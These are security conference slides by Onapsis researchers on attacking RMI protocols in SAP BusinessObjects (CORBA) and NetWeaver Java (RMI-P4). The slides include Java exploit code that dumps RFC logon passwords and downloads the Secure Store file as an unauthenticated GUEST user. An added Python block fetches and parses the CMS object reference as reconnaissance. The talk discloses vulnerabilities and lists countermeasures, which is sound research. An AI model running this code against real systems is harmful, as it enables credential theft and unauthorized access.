Dissecting and Attacking RMI Frameworks

Nahuel D. Sánchez, Sergio Abraham (@serj_ab), Onapsis

Uploaded by onapsis-inc, posted 16-Jul-2015

CONFIDENTIAL © 2014 Onapsis, Inc. All Rights Reserved 03/12/2014

Disclaimer

This presentation contains references to the products of SAP AG. SAP, R/3, xApps, xApp, SAP NetWeaver, Duet, PartnerEdge, ByDesign, SAP Business ByDesign, and other SAP products and services mentioned herein are trademarks or registered trademarks of SAP AG in Germany and in several other countries all over the world.

Business Objects and the Business Objects logo, BusinessObjects, Crystal Reports, Crystal Decisions, Web Intelligence, Xcelsius and other Business Objects products and services mentioned herein are trademarks or registered trademarks of Business Objects in the United States and/or other countries.

SAP AG is neither the author nor the publisher of this publication and is not responsible for its content, and SAP Group shall not be liable for errors or omissions with respect to the materials.


Onapsis Inc. Overview

Transforming how organizations protect the applications that manage their business-critical processes and information.

Founded: 2009

Locations: Buenos Aires, AR | Boston, MA | Berlin, DE | Lyon, FR

Technology: Onapsis X1 (Auditor Solution)

Onapsis Security Platform (Enterprise Solution)

(PCT patent-pending)

Pricing: Subscription-based (Enterprise, Audit On-Demand and MSP)

Research: 130+ SAP security advisories and presentations published


Who are We?

Sergio: SAP Security Specialist

Nahuel: Security Researcher

• Reported more than 25 vulnerabilities in different SAP Products

• Onapsis Blog contributors

• Authors of Onapsis SAP Security In-Depth Publications

• Speakers/Trainers at Ekoparty, Hubcon, SANS

Agenda

Introduction
• What is RMI?
• RMI Implementations
• RMI vs Web Services

CORBA implementation
• Basic concepts (IDLs, IORs)
• CORBA and SAP Business Objects
• Attacks

P4 implementation
• Basic Concepts
• P4 and SAP NetWeaver

Conclusions

Introduction | What is RMI?

RMI stands for Remote Method Invocation

Conceptually similar to RPC (Remote Procedure Call)

Allows a client to invoke methods on objects running on a remote machine


Introduction | What is RMI? Cont’d

RMI vs Web Services

Same idea, different implementation

Both allow users to execute actions on the server

RMI
• 15-20 years old
• Complex (object management, garbage collection)
• Provides interfaces for legacy systems
• Stateful
• A more profitable attack target

Web Services
• 15-20 years old
• Stateless
• Designed with the limitations/problems of RMI already in mind

Introduction | What is RMI? Cont’d

Products using RMI-based protocols
• JBoss Application Server (Java RMI)
• Oracle WebLogic Server (WebLogic RMI)
• IBM Lotus Domino (Java RMI)
• Apache Axis2 (CORBA)

In this talk
• SAP Business Objects (CORBA)
• SAP NetWeaver Java (RMI-P4)


So…What is SAP?

SAP (Systems, Applications and Products in Data Processing) is a German

company devoted to the development of business solutions.

Founded in 1972.

Almost 67,000 employees.*

More than 253,000 customers.*

Presence in most countries

Third biggest independent software vendor (ISV).

* http://www.sap.com/corporate-en/about/our-company/index.html
* http://en.wikipedia.org/wiki/SAP_SE


SAP Solutions

Enterprise Solutions

SAP CRM (Customer Relationship Management).

SAP ERP (Enterprise Resource Planning).

SAP SCM (Supply Chain Management).

SAP SRM (Supplier Relationship Management).

Business Solutions

SAP GRC (Governance, Risk and Compliance).

SAP Portal

SAP Solution Manager

SAP Business Objects


CORBA implementation

Common Object Request Broker Architecture

Connect different software components (local/remote)

Language agnostic

Object oriented

Provides “Objectization” to non-object languages like C or COBOL

http://pubs.opengroup.org/onlinepubs/9279299/apdxa.htm


Common Object Request Broker Architecture

http://www.cs.wustl.edu/~schmidt/corba-overview.html


CORBA – Locating objects

CORBA Naming Service

• Implemented as an “Object Service”

• Provides a way to locate other objects

CorbaLoc & CorbaName URLs

• Similar to “common” URLs

corbaloc::target:1234/MyObjectKey

corbaname::target:1234/NameService#Hello/World

CORBA – Locating objects

Interoperable Object References (IOR)
• Object key
• IP address / hostname
• Listening port
• Repository ID

IOR (truncated on the slide):
IOR:010000003500000049444c3a696d672e73656167617465736f6674776172652e636f6d2f

Parsed IOR:
_IIOP_ParseCDR: byte order LittleEndian, repository id <IDL:img.seagatesoftware.com/ImplServ/OSCAFactory:3.1>, 1 profile
_IIOP_ParseCDR: profile 1 is 70 bytes, tag 0 (INTERNET), LittleEndian byte order
(iiop.c:parse_IIOP_Profile): bo=LittleEndian, version=1.1, hostname=BO4WV, port=1056, object_key=<....`hjR........>
object key is <#00#00#00#00`hjR#88#C5#0C#00#02#00#00#00>; no trustworthy most-specific-type info; unrecognized ORB type; reachable with IIOP 1.1 at host "BO4WV", port 1056

CORBA – IDLs

Interface Definition Language (IDL)
• Defines the objects (interfaces and their methods)
• Shared by the client and the server
• Compiled into language-specific stubs and skeletons

Example IDL interface

//fortune.idl
module Fortune {
  interface CookieServer {
    string get_cookie();
  };
};

CORBA & SAP Business Objects

Used for inter-process communication only

SAP doesn’t provide IDLs for the objects

Options we have:
• Reverse engineering the IDLs from the classes (PITA)
• Import the Java JAR files and use them directly

Files required:
• corbaidl.jar
• ebus405.jar


CORBA & SAP Business Objects

The BOE Central Management Server (CMS)

• Platform’s brain

• Keeps track of all enabled services/servers

Name server port

• Port TCP 6400 (default)

• Applications use this port for first contact

Request port

• Dynamic port by default

• Used by all applications after first request

What do we need to attack a BO implementation?

CMS IP

CMS static port

CMS IOR

Servers’ IORs

Obtaining the CMS IOR

Obtained through traffic analysis

The client sends the string “aps” to the CMS static port (6400)

The CMS returns its IOR

Needed for the further attacks
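The two CORBA steps above, decoding an IOR into host/port/object key (the "Parsed IOR" slide) and pulling the CMS IOR out of the "aps" first-contact reply, as an added Python example that is not part of the original deck and not Onapsis code. The CDR layout (byte-order flag, length-prefixed NUL-terminated strings, 4-byte alignment, IIOP profile encapsulation) is the standard one; the sample IOR is constructed here from the fields the slide's parsed output shows (repository id, host BO4WV, port 1056, object key) and is not the real 70-byte IOR, which also carries tagged components. The slides do not show how the CMS frames its reply, so fetch_cms_ior assumes it can read until the socket closes or times out and then regex-match the "IOR:" string; treat that as an assumption.

```python
import re
import socket
import struct


class CdrReader:
    """Reads CDR primitives; alignment is relative to the start of each encapsulation,
    so a nested IIOP profile body gets its own reader."""

    def __init__(self, data: bytes):
        self.data, self.pos = data, 0
        self.little = self.read_octet() == 1  # leading flag: 0 = big endian, 1 = little endian

    def align(self, n: int) -> None:
        self.pos += (-self.pos) % n

    def read_octet(self) -> int:
        self.pos += 1
        return self.data[self.pos - 1]

    def read_ushort(self) -> int:
        self.align(2)
        (v,) = struct.unpack_from("<H" if self.little else ">H", self.data, self.pos)
        self.pos += 2
        return v

    def read_ulong(self) -> int:
        self.align(4)
        (v,) = struct.unpack_from("<I" if self.little else ">I", self.data, self.pos)
        self.pos += 4
        return v

    def read_octets(self) -> bytes:
        n = self.read_ulong()
        if self.pos + n > len(self.data):
            raise ValueError("truncated sequence")  # e.g. an IOR cut off in a slide or log
        self.pos += n
        return self.data[self.pos - n:self.pos]

    def read_string(self) -> str:
        raw = self.read_octets()  # CDR string length includes the trailing NUL
        if not raw.endswith(b"\0"):
            raise ValueError("unterminated CDR string")
        return raw[:-1].decode("latin-1")


def parse_ior(ior: str) -> dict:
    """Type id plus version/host/port/object key of every TAG_INTERNET_IOP profile."""
    if not ior.startswith("IOR:"):
        raise ValueError("not a stringified IOR")
    r = CdrReader(bytes.fromhex(ior[4:]))
    out = {"byte_order": "little" if r.little else "big", "type_id": r.read_string(), "profiles": []}
    for _ in range(r.read_ulong()):
        tag, body = r.read_ulong(), r.read_octets()
        prof = {"tag": tag, "length": len(body)}
        if tag == 0:  # TAG_INTERNET_IOP
            p = CdrReader(body)
            prof["version"] = f"{p.read_octet()}.{p.read_octet()}"
            prof["host"] = p.read_string()
            prof["port"] = p.read_ushort()
            prof["object_key"] = p.read_octets()
            if prof["version"] != "1.0":  # IIOP 1.1+ appends a sequence<TaggedComponent>
                prof["components"] = p.read_ulong()
        out["profiles"].append(prof)
    return out


def build_iiop_ior(type_id: str, host: str, port: int, object_key: bytes) -> str:
    """Inverse of parse_ior: one little-endian IIOP 1.1 profile with no tagged components."""
    def cdr_string(s: str) -> bytes:
        raw = s.encode("latin-1") + b"\0"
        return struct.pack("<I", len(raw)) + raw

    def pad(buf: bytes, n: int) -> bytes:
        return buf + b"\0" * ((-len(buf)) % n)

    body = pad(bytes([1, 1, 1]), 4) + cdr_string(host)  # byte order, major, minor, host
    body = pad(body, 2) + struct.pack("<H", port)
    body = pad(body, 4) + struct.pack("<I", len(object_key)) + object_key
    body = pad(body, 4) + struct.pack("<I", 0)  # zero tagged components
    top = pad(bytes([1]), 4) + cdr_string(type_id)
    top = pad(top, 4) + struct.pack("<III", 1, 0, len(body)) + body  # 1 profile, tag 0
    return "IOR:" + top.hex()


IOR_RE = re.compile(rb"IOR:[0-9a-fA-F]+")


def extract_ior(reply: bytes) -> str:
    """First stringified IOR found in whatever bytes the CMS sends back."""
    m = IOR_RE.search(reply)
    if not m:
        raise ValueError("no IOR in reply")
    return m.group(0).decode("ascii")


def fetch_cms_ior(host: str, port: int = 6400, timeout: float = 5.0) -> str:
    """Send the "aps" first-contact string to the CMS name server port and return its IOR.
    Assumption (the slides do not show the reply framing): read until EOF or timeout."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.sendall(b"aps")
        chunks = []
        try:
            while chunk := s.recv(4096):
                chunks.append(chunk)
        except socket.timeout:
            pass
    return extract_ior(b"".join(chunks))


# Constructed sample (not the real 70-byte IOR): the fields the slide's parsed output shows.
SAMPLE_IOR = build_iiop_ior("IDL:img.seagatesoftware.com/ImplServ/OSCAFactory:3.1", "BO4WV", 1056,
                            bytes.fromhex("0000000060686a5288c50c0002000000"))
```

The host and port recovered from the profile are what you need next: the CMS IOR points at the dynamic request port, not the static 6400, so `parse_ior(fetch_cms_ior(cms_ip))["profiles"][0]` gives the endpoint the rest of the attack talks to. Feeding the slide's truncated IOR string into `parse_ior` raises "truncated sequence" rather than returning garbage.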


DEMO #1


DEMO #2


RMI-P4

SAP proprietary protocol

Present in every SAP NetWeaver Application Server Java

Combines features of Java RMI and CORBA

Listens on port 5XX04 (5XX06 for SSL), where XX is the instance number

Can be tunneled through HTTP!!! P4HTTP (port 5XX05)

Enables client-server communication:
• Locating remote objects
• Communication with remote objects
• Loading classes remotely

Examples:
• SAP Enterprise Portal
• SAP Solution Manager

https://help.sap.com/saphelp_nwce711/helpdata/en/48/295738a14558d8e10000000a421937/content.htm

RMI-P4

Where specifically is RMI-P4 used?
• Real example: JMX (Java Management Extensions)
o Allows building manageable distributed Java apps
  start/stop/restart
  changing configuration
  backup/import settings/so on…
o Client-server architecture based on: RMI-P4

In fact... SAP NetWeaver Application Server Java is based on a JMX architecture

http://wiki.scn.sap.com/wiki/pages/viewpage.action?pageId=73160

RMI-P4

Basic implementation

• Server-side:

// Remote interface: every remote method declares RemoteException.
public interface HelloWorld extends java.rmi.Remote {
    public void hello() throws java.rmi.RemoteException;
}

// Implementation: the method name and signature must match the interface.
public class HelloWorldImpl implements HelloWorld {
    public void hello() throws java.rmi.RemoteException {
        System.out.println("Hello World");
    }
}

• Server and Client-side:

RMI-P4 does not use IDLs (as CORBA does).

The interfaces are already known to the client, since they are defined on both sides.

RMI-P4

How to find and invoke a remote object?

JNDI (Java Naming and Directory Interface)

Standard Java API

Allows applications to access multiple naming and directory services via a common interface

Two very interesting features:
• Naming Service
• Directory Service

https://help.sap.com/saphelp_nwce711/helpdata/en/99/e8b84172133131e10000000a155106/content.htm


Let’s mix the ingredients

RMI-P4

import java.util.Properties;
import javax.naming.Context;
import javax.naming.InitialContext;

public class BankClient {
    public static void main(String[] args) {
        try {
            Properties p = new Properties();
            // Specify the type of the InitialContext factory (SAP's P4 JNDI provider).
            p.put(Context.INITIAL_CONTEXT_FACTORY,
                  "com.sap.engine.services.jndi.InitialContextFactoryImpl");
            p.put(Context.PROVIDER_URL, "p4://" + args[0] + ":" + args[1]); // Specify the URL.
            p.put(Context.SECURITY_PRINCIPAL, args[2]);   // Specify the user.
            p.put(Context.SECURITY_CREDENTIALS, args[3]); // Specify the password.
            Context initialContext = new InitialContext(p); // Connect to the server by the InitialContext.
            // Account is the application's own remote interface, bound under the JNDI name "Bank".
            Account account = (Account) initialContext.lookup("Bank");
            // Invoke methods remotely.
            account.deposit(100);
            System.out.println("Balance:" + account.getBalance());
            System.out.println("Try to draw...");
            account.draw(50);
            System.out.println("Balance:" + account.getBalance());
        } catch (Exception ex) {
            ex.printStackTrace();
        }
    }
}

RMI-P4

p.put(Context.SECURITY_PRINCIPAL, args[2]);   // Specify the user.
p.put(Context.SECURITY_CREDENTIALS, args[3]); // Specify the password.

What happens if we do not specify this?

The user is logged in as GUEST and, as every application defines its own security requirements, it only takes one missing authorization check to get full access!

https://help.sap.com/saphelp_nw73ehp1/helpdata/en/e9/88435b5d84b24e8c62048ff36bd600/content.htm
http://help.sap-ag.de/saphelp_nw73/helpdata/de/4a/eac9a0cd2823aee10000000a42189c/frameset.htm

RMI-P4

Attack 1: Authentication Credentials Disclosure

Example target for this attack: System Landscape Directory (SLD)
• Central information repository
• Consolidates all systems, hardware and software components
• Allows administration of systems
o Installation
o Updates and patches
o Interfaces
• Mandatory in every SAP implementation

http://help.sap.com/saphelp_nw70/helpdata/en/21/84570b3ae14e77b3047c82218974b9/content.htm

DEMO: Authentication Credentials Disclosure

RMI-P4

Attack 1: Authentication Credentials Disclosure

import java.util.Properties;
import javax.naming.Context;
import javax.naming.InitialContext;

// No SECURITY_PRINCIPAL / SECURITY_CREDENTIALS: the lookup runs as GUEST.
// host and port are the target's P4 endpoint (5XX04).
Properties p = new Properties();
p.put(Context.INITIAL_CONTEXT_FACTORY,
      "com.sap.engine.services.jndi.InitialContextFactoryImpl");
p.put(Context.PROVIDER_URL, "p4://" + host + ":" + port);
Context initialContext = new InitialContext(p);
// Stub and BundleConfiguration classes come from the SAP client JARs;
// "rfcengine" is the JNDI name the service is bound under.
RFCRuntimeInterface_Stub o =
    (RFCRuntimeInterface_Stub) initialContext.lookup("rfcengine");
BundleConfiguration[] bc = o.getConfigurations();
for (int i = 0; i < bc.length; i++) {
    // Each configured RFC destination carries its logon client, user and password.
    String data =
        bc[i].getLogonClient() + ":" + bc[i].getLogonUser() + ":" + bc[i].getLogonPassword();
    System.out.println(data);
}

RMI-P4

Attack 2: Anonymous Remote File Read/Write

Targeted service: File Transfer Service API
• SAP Ready-to-Use Service
• Allows upload/download of files to/from the AppServer
• Most common use case: deployment of Java applications
• Main problem: lack of authorization checks
o Consequence: accessible by the GUEST user!

http://help.sap.com/saphelp_oil472/helpdata/en/48/1d813ecfd43546e10000000a114084/content.htm

One more step… get the Secure Store:
• Secure Store container (SecStore.properties)
• Secure Store key (SecStore.key)
• Decrypt! (3DES)

DEMO: Anonymous Remote File Read/Write

RMI-P4

Attack 2: Anonymous Remote File Read/Write

import java.util.Properties;
import javax.naming.Context;
import javax.naming.InitialContext;

// Again no credentials: the "file" service is reachable as GUEST.
Properties p = new Properties();
p.put(Context.INITIAL_CONTEXT_FACTORY,
      "com.sap.engine.services.jndi.InitialContextFactoryImpl");
p.put(Context.PROVIDER_URL, "p4://" + host + ":" + port);
Context initialContext = new InitialContext(p);
FileTransfer_Stub o = (FileTransfer_Stub) initialContext.lookup("file");
// Local path on the attacker's machine (backslashes escaped for Java) and the
// remote path of the Secure Store container; <SID> is the target system ID.
String source = "C:\\tmp\\SecStore.properties";
String dest = "/usr/sap/<SID>/SYS/global/security/data/SecStore.properties";
com.sap.engine.services.file.RemoteFile f = o.createRemoteFile(source, dest);
f.download(); // copies the remote file to the local path


Protection / Countermeasure

Secure the P4 service (ports 5XX04, 5XX05, 5XX06)

Apply all SAP Security Notes. Keep the systems up-to-date.

Implement SAP Security Notes 1682613 and 1819822.

Check the “References” slide for more information!


Conclusions

Questions?

Nahuel D. Sánchez, Sergio Abraham (@serj_ab)

Thank you!